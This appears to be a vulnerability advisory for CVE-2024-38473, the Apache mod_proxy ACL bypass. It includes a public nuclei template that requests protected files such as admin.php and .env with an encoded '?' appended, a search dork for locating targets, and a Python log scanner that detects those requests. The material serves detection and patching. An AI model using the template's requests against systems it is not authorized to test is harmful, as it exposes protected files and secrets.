CVE-2024-38473: Apache HTTP Server - ACL Bypass

Date: 2025-08-01 | Affected software: Apache HTTP Server | PoC: public

Vulnerability description

Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.

PoC code [public]

id: CVE-2024-38473

info:
  name: Apache HTTP Server - ACL Bypass
  author: pdteam
  severity: high
  description: |
    Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.
  remediation: |
    Fixed in v2.4.60
  reference:
    - https://blog.orange.tw/2024/08/confusion-attacks-en.html#%E2%9A%94%EF%B8%8F-Primitive-1-2-ACL-Bypass
    - https://www.cvedetails.com/cve/CVE-2024-38473/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38473
    - https://httpd.apache.org/security/vulnerabilities_24.html
    - https://security.netapp.com/advisory/ntap-20240712-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 8.1
    cve-id: CVE-2024-38473
    cwe-id: CWE-116
    epss-score: 0.85806
    epss-percentile: 0.99341
    cpe: cpe:/a:apache:http_server, cpe:/a:apache:httpd
  metadata:
    max-request: 10
    vendor: Apache Software Foundation
    product: Apache HTTP Server
    google-query: intitle:"Apache HTTP Server" inurl:"/server-status"
  tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm

flow: |
  http(1) && http(2)
  http(3)

http:
  # Path normalization ACL bypass
  - method: GET
    path:
      - "{{BaseURL}}/{{files}}"

    payloads:
      files:
        # Each filename is listed once; with stop-at-first-match the duplicate
        # entries in the original list only cost extra requests.
        - admin.php
        - adminer.php
        - xmlrpc.php
        - .env
        - php-info.php
        - php_info.php
        - phpinfo.php
        - info.php
        - bin/cron.php
        - cache/index.tpl.php
        - cpanel.php

    stop-at-first-match: true
    matchers:
      - type: status
        status:
          - 403
          - 401
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{http_1_files}}%3ftest.php"

    matchers:
      - type: status
        status:
          - 200

  # docroot confusion
  - method: GET
    path:
      - "{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"

    matchers:
      - type: word
        words:
          - "On Debian systems, the complete text of the GNU General Public License"
          - "This package was written by Peter Tobias"
        condition: and
# digest: 4a0a00473045022100a8fd75784108634778eea2c3e848127b2c1759254d9cd2f2daf5b64dca0e7201022063aa36e0e09c06be24317bfa01a1591cbb648a6f8ad7dda9e73d37991795cde7:922c64590222798bb761d5b6d8e72950
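As an added detection example (not part of this page or of the nuclei template above), the following Python scans Apache combined-format access log lines for the request shape the template sends: a request path whose path portion carries a percent-encoded `?` (`%3f`), as in `admin.php%3ftest.php` or `copyright%3f`. Legitimate paths rarely contain an encoded `?`, and a 200 response on such a path after a 403/401 on the plain path is the signal the template itself relies on. The log lines are constructed for illustration.

```python
import re

# Apache combined log format:
# host ident user [time] "METHOD PATH PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# A percent-encoded '?' inside the path portion of the request line.
# Apache decodes it before the <Files>/<Location> ACL match, so the ACL
# sees "admin.php?test.php" instead of "admin.php", while mod_proxy later
# forwards the request to the backend with the '?' acting as a separator.
ENCODED_QMARK_RE = re.compile(r'%3f', re.IGNORECASE)

def is_suspicious_path(path: str) -> bool:
    """True if the raw request path contains an encoded '?' before any real '?'."""
    raw_path = path.split('?', 1)[0]  # a literal '?' starts the real query string
    return ENCODED_QMARK_RE.search(raw_path) is not None

def scan_access_log(lines):
    """Return one dict per log line whose request path is suspicious.

    'bypassed' marks a 200 on such a path: the strongest sign that an ACL
    which would have blocked the plain path did not apply.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        if is_suspicious_path(m.group('path')):
            hits.append({
                'host': m.group('host'),
                'path': m.group('path'),
                'status': int(m.group('status')),
                'bypassed': m.group('status') == '200',
            })
    return hits

# Constructed sample lines (not real traffic); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /admin.php HTTP/1.1" 403 199 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Aug/2025:10:00:02 +0000] "GET /admin.php%3ftest.php HTTP/1.1" 200 1532 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Aug/2025:10:00:03 +0000] "GET /index.php?page=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Aug/2025:10:00:04 +0000] "GET /info.php%3F HTTP/1.1" 403 199 "-" "python-requests/2.31"',
    '203.0.113.9 - - [01/Aug/2025:10:00:05 +0000] "GET /html/usr/share/doc/hostname/copyright%3f HTTP/1.1" 200 2451 "-" "curl/8.0"',
]

if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```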
